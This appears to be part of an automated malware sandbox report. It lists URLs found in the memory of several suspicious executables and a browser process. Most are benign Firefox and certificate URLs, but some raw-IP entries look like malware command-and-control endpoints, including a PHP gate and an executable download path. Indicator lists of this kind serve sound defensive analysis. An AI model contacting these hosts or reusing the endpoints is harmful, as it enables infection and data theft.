Source: file.exe, 00000000.00000003.2280639357.0000000001680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280639357.00000000016A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2280639357.0000000001680000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/1
Source: file.exe, 00000000.00000003.2280639357.0000000001680000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/G
Source: file.exe, file.exe, 00000000.00000003.2281042245.0000000006127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.2280639357.0000000001680000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/og
Source: num.exe, 0000001D.00000002.3041700292.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3175826524.00000000011FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/405117-2476756634-1003
Source: num.exe, 0000001D.00000002.3041700292.0000000001130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: num.exe, 0000001D.00000002.3041700292.0000000001130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/B
Source: num.exe, 0000001D.00000002.3041700292.0000000001130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/S
Source: 7a5878ed96.exe, 0000000A.00000002.2913077883.000000000104E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php1
Source: num.exe, 0000001D.00000002.3041700292.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php3.
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.00000000011FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php6-535557bcc5fa
Source: 7a5878ed96.exe, 0000000A.00000002.2913077883.00000000010C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpIlm
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpON
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpkN
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpm
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpwN
Source: 7a5878ed96.exe, 0000000A.00000002.2913077883.00000000010C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpyl
Source: num.exe, 0000001D.00000002.3041700292.0000000001130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/8
Source: num.exe, 0000001D.00000002.3041700292.0000000001130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/A
Source: 7a5878ed96.exe, 0000000A.00000002.2913077883.00000000010B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/E
Source: 7a5878ed96.exe, 0000000A.00000002.2913077883.00000000010B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/N
Source: num.exe, 0000001D.00000002.3041700292.0000000001130000.00000004.00000020.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3175826524.00000000011FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/T
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/W
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.00000000011FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/k
Source: num.exe, 0000001D.00000002.3041700292.0000000001130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/l
Source: 7a5878ed96.exe, 0000000A.00000002.2913077883.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001253000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: 7a5878ed96.exe, 0000000A.00000002.2913077883.000000000104E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206y_
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001A.00000002.3185612064.000002592F67D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjs
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjsisDownloa
Source: file.exe, 00000000.00000003.2198672347.000000000167F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001A.00000003.3095834333.0000025934AE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001A.00000003.3079779963.0000025935546000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.3072690944.000002593B85F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B88E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3023968614.0000025933E8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3017245931.0000025933EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3023968614.0000025933EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3153782991.000002593D887000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3015518419.0000025933EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3152376334.00000259331EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3183561232.000002592F1DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3017245931.0000025933E8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3125338217.0000025933E8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3023968614.0000025933E76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3125338217.0000025933E76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3141387897.0000025933EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3141387897.0000025933E8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001A.00000002.3185612064.000002592F67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000003.3153782991.000002593D887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001A.00000003.3153782991.000002593D887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001A.00000002.3185612064.000002592F67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001A.00000002.3185612064.000002592F67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shandlerSvc
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/browse
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-su
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://builtin-themes/colorways/202
Source: firefox.exe, 0000001E.00000002.3166770758.0000023D4623C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3079615803.0000023D4623C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3061407451.0000023D4623C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3055375903.0000023D4623C000.00000004.00000020.00020000.00000000.sdmp, mozilla-temp-41.26.dr String found in binary or memory: http://www.videolan.org/x264.html
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3153782991.000002593D887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2141877080.000000000614B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2848125428.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2977694380.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3125926570.0000000005E79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3153782991.000002593D887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000003.2996313213.0000025933A6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995425549.0000025933800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995881145.0000025933A38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2996104229.0000025933A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995647745.0000025933A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpamazondotcom%40search.mozilla.org:1.6resource://gre/modules/T
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3176703968.0000025923911000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3072690944.000002593B8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
